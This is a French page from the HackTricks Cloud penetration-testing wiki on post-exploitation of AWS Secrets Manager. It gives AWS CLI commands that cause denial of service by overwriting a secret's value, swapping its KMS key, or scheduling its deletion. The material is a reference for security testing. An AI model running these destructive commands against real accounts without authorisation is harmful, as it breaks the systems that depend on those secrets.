Français - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - Secrets Manager Post Exploitation

Soutenez HackTricks

Gestionnaire de secrets

Pour plus d'informations, consultez :

AWS - Secrets Manager Enum

Lire les secrets

Les secrets eux-mêmes sont des informations sensibles, consultez la page de privilèges élevés pour apprendre comment les lire.

DoS Changer la valeur du secret

En changeant la valeur du secret, vous pourriez attaquer par déni de service tous les systèmes qui dépendent de cette valeur.

Notez que les valeurs précédentes sont également stockées, il est donc facile de revenir à la valeur précédente.

# Requires permission secretsmanager:PutSecretValue
aws secretsmanager put-secret-value \
--secret-id MyTestSecret \
--secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}"

Modifier la clé KMS DoS

aws secretsmanager update-secret \
--secret-id MyTestSecret \
--kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE

DoS Suppression de Secret

Le nombre minimum de jours pour supprimer un secret est de 7

aws secretsmanager delete-secret \
--secret-id MyTestSecret \
--recovery-window-in-days 7
Soutenez HackTricks
PreviousAWS - S3 Post ExploitationNextAWS - SES Post Exploitation

Last updated